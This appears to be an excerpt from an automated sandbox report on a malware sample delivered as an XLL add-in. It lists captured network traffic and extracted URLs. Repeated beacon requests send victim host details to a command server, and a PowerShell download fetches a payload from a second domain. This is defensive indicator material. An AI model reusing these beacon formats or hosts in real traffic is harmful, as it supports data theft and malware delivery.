Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00611FC0 InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 16_2_00611FC0
Source: global traffic HTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru
Source: global traffic HTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: srand04rf.ru
Source: unknown HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Source: snd32sys.exe String found in binary or memory: http://api.ipify.org
Source: snd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
Source: 0708_5355150121.xll String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000002.00000003.226352766.0000000007D51000.00000004.00000001.sdmp, 0708_5355150121.xll String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 0708_5355150121.xll String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 0708_5355150121.xll String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 0708_5355150121.xll String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 0708_5355150121.xll String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 0708_5355150121.xll String found in binary or memory: http://ocsp.comodoca.com0
Source: 0708_5355150121.xll String found in binary or memory: http://ocsp.sectigo.com0
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png8
Source: powershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmp String found in binary or memory: http://srand04rf.ru
Source: powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmp String found in binary or memory: http://srand04rf.ru/08
Source: PowerShell_transcript.888683.93l2YHGR.20210708163033.txt.6.dr String found in binary or memory: http://srand04rf.ru/08.jpg
Source: powershell.exe, 00000006.00000002.332529239.0000000004AEB000.00000004.00000001.sdmp String found in binary or memory: http://srand04rf.ru4&jt
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.aadrm.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.office.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.onedrive.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://augloop.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://cdn.entity.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://clients.config.office.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://config.edge.skype.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://cortana.ai/api
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://cr.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://dev.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://devnull.onenote.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://directory.services.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
